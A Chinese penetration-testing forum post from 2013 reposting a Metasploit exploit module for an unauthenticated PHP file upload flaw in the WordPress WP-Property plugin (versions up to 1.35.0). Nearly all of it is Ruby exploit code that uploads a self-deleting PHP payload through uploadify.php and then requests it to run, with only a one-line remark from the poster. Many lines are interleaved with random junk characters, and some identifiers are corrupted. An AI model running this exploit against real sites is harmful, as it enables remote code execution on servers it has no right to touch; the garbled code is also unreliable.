中国网络渗透测试联盟

标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页]
作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞
2 O1 i! v3 d0 V1 m/ s7 o) W) ^' ?5 B% b. Z7 {! s" R  n
## # This file is part of the Metasploit Framework and may be subject to
2 A0 N5 C, L9 x/ v" F6 r! c, W9 q% s
* _8 d5 Z. Z( o7 K# redistribution and commercial restrictions. Please see the Metasploit
; F/ l9 n+ ^# J6 Q' N! k
  e7 {' x! L' W" w# Framework web site for more information on licensing and terms of use.
! Y. l7 J" P% ]7 r! y5 w& V6 z3 h( U( u: S4 j
#   http://metasploit.com/framework/ ##3 Y# `  m) e! y' g) Z& r
) m! Q5 x5 l5 Q
1 g* Q' m+ q; |! n: b+ h$ [/ a$ l2 f& a
4 J7 _$ z. N4 I/ m: M* W
: l. H( u7 p( \. L% _
2 ~/ i# e7 j, u
require 'msf/core'
; }1 \9 d' e5 nrequire 'msf/core/exploit/php_exe'  I8 o/ ]3 [( t* h  p

- _1 X( ^) c2 h/ h& \; Fclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
# m6 U1 h! P/ @  r9 j) j& h'Description'    => %q{
4 E' l! m. R. m; _: NThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
% x1 e  [& v' ?# O3 \! x[
5 N) u% M6 w  @/ k5 K+ A7 n'Sammy FORGIT', # initial discovery, t4 _9 B7 C# A& H- @8 B  c- H
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
. E/ o, r# h6 c* w, `],
! n- c2 K  k3 x; h  K* h2 |'License'        => MSF_LICENSE,  Z& I0 R/ G5 M' r% j! k
'References'     =>
0 ~: k( ~/ `' f[
/ e4 _+ u" c9 }[ 'OSVDB', '82656' ],
. q4 F' t2 r) a  i" {4 |2 s, B[ 'BID', '53787' ],' ?2 l, C: ~. v6 }8 A
[ 'EDB', '18987'],
# A+ Q3 y$ n' N, j  N[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
, M" l* R9 y1 Q],
: Q$ J' }3 |5 Y1 n1 H3 x'Payload'        =>" L% r0 E* V. S: z
{# Y& u4 A1 g3 ~2 {3 o. }
'BadChars' => "\x00",( [( N1 H) ?& N/ N+ a
},
9 D) q) V. @7 [# k7 p2 X. i'Platform'       => 'php',% T- k6 I9 }8 \$ L
'Arch'           => ARCH_PHP,
. i2 ]$ Q  T: Z4 x+ q'Targets'        =>' ^/ f( d3 {& {  Q$ S5 Y
[1 ?7 y9 g: G# O. {- m" J* `
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],0 x1 g' ^5 T  L* C. t. c
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
; d* I- K) a% c1 t% j],* x- G  |# ~' k- m# I2 I: K' X
'DefaultTarget'  => 0,) C6 p- G8 L2 _8 @
'DisclosureDate' => 'Mar 26 2012'))
& w9 L  L: X) r) [! `" y4 _. E+ R$ G1 G7 i% a
register_options(3 N6 z! B3 E" b6 T- w( \+ J
[. m; {) h/ X5 l
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])' {$ \. }: M1 t& ?
], self.class)
1 J0 K- B) D8 W- w# v9 F2 Zend4 T9 k  ^0 z1 J2 Y, I4 q* E9 F
+ G8 u# x$ m4 P% H; N# o
def check- D4 o: {/ i6 y3 L) S
uri =  target_uri.path
/ v2 [2 u8 X/ x. X4 q! |; Kuri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
% Z+ k, a- B/ z' u4 l: W5 j'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"! a) s# x, ]9 A
})  O7 b8 R9 n3 \" g1 d: Y; r

3 T; m& S0 y* j6 b& U( uif not res or res.code != 200
$ p5 b1 l  A6 |% P; N7 r- greturn Exploit::CheckCode::Unknown9 u. e, s* J% w. K
end
) D4 I2 }- z4 L6 `: C2 u; W- G8 W' B/ j' X# W
return Exploit::CheckCode::Appears
" A2 O, k  h. ~end( Z: ]' y+ u% G3 g6 K2 P

7 D/ S& @) l- p2 t: d' Xdef exploit
" H  y& y5 k% A, _( z0 r/ j5 Xuri =  target_uri.path
4 v+ I; d& u8 |/ {1 P$ @+ h9 Wuri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
2 ], ~8 X( O" W+ U8 S7 x8 M" w$ @* H* q. x3 n
data = Rex::MIME::Message.new# g" ?4 G: x6 S2 w( |- `- v# K0 k
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")1 [4 K: i$ a6 ?) p& K/ }
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")2 F- n0 p7 y+ k( S! \
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')# ]& n" [; x  Z6 l9 W% n) L& z6 {6 ]
! R3 z6 \( C9 b9 i$ W& M  n
print_status("#{peer} - Uploading payload #{@payload_name}")
. W3 f* g* _9 i; d( M) r# Pres = send_request_cgi({
- Y8 Q: R: A; M5 I) `9 g" c'method' => 'POST',' H- Q6 x" w+ f1 |
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
. }: ?2 v* _4 k# N: E# G2 A'ctype'  => "multipart/form-data; boundary=#{data.bound}",! N. E2 V" m0 I5 O3 I( @
'data'   => post_data$ c) S, u8 z& m& W) o
})
% m% X. P: a1 O4 B7 I  w! H6 g7 H: b& ], X  x+ k, u
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
+ ?; v# t9 z) G! n* f1 Z, }+ Vfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
$ m+ M+ _1 q# `0 b' Qend( C4 v) B5 y6 {3 f& @( Y" G4 w

: u, f0 M4 T% \# Zupload_uri = res.body  c* l7 R4 U! [
' M; _# f1 h# Y# D% h3 V5 {
print_status("#{peer} - Executing payload #{@payload_name}")0 S' d5 G- I: s4 e
res = send_request_raw({
  H; k# r# Q5 v( a- Q'uri'    => upload_uri,9 `9 Z& {3 K. ]) g. X% W  \
'method' => 'GET'
& M5 h& b( s2 _) U* Q( o; D  q  Q( [})
" M4 z- A% S3 s: j/ y: ^* ~end/ `* }- |3 y% Z, L# q) \: j% D
end2 P( _( f$ d- x2 U/ r1 l

. u; O- x* t% W& g5 a不要问我这写的是什么 怎么利用 我是说msf.! ~2 u, }! u4 `" E$ A& v  A2 s

. Q7 _5 S/ ?" R5 w: j" k



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2